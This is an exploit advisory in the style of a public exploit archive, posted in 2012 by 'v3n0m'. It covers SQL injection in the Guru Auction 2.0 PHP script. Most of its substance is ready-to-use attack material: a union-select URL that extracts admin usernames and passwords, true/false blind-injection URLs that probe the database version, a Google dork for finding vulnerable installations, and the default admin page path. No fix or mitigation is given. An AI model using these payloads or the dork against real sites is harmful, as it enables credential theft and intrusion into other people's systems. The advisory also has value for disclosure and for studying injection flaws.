[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Guru Auction 2.0 Multiple SQL Injection Vulnerabilities
# Published : 2012-12-26
# Author :
# Previous Title : SelectSurvey CMS (ASP.NET) Arbitrary File Upload
# Next Title : Invision Power Services Invision Gallery 1.0.1 Multiple SQL Injection Vulnerabilities


     )   )            )                     (   (         (   (    (       )     ) 
  ( /(( /( (       ( /(  (       (    (     ) )) )      ) )) ) ) ) ( /(  ( /( 
  )())())) )    )()) )      )   )   (()/(()/(  (  (()/(()/((()/( )()) )())
 ((_)((_)(()/(   ((_)((((_)(  (((_)(((_)(  /(_))(_)) )  /(_))(_))/(_))(_)|((_) 
__ ((_)((_)/(_))___ ((_) _ ) )___) _ )(_))(_))_ ((_)(_))(_)) (_))  _((_)_ ((_)
  / / _ (_)) __  / (_)_(_)(/ __(_)_(_) _ |   | __| _  |  |_ _|| | | |/ / 
  V / (_) || (_ | V / / _   | (__ / _  |   /| |) | _||   / |__ | | | .` | ' <  
  |_| ___/  ___| |_| /_/ _  ___/_/ _|_|_|___/|___|_|_____|___||_|_|_|_
										.WEB.ID
-----------------------------------------------------------------------
        Guru Auction 2.0 Multiple SQL Injection Vulnerabilities
-----------------------------------------------------------------------
Author  	: v3n0m
Site    	: http://ycl.sch.id/
Date		: December, 26-2012
Location	: Yogyakarta, Indonesia
Time Zone	: GMT +7:00

Application	: Guru Auction 2.0
Price		: $49
Vendor  	: http://www.guruscript.com/
Google Dork	: inurl:subcat.php?cate_id=
-----------------------------------------------------------------------

SQLi p0c:
~~~~~~~~~~
http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--


Blind SQLi p0c:
~~~~~~~~~~
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false


Default Admin Page:
~~~~~~~~~~
http://domain.tld/[path]/admin/

-----------------------------------------------------------------------

Thanks:

LeQhi, lingah, Ozie, m4rc0, g0nz, L1ntang, GheMaX, chainloader, SakitJiwa, Susant, dextone, drubicza, f4c0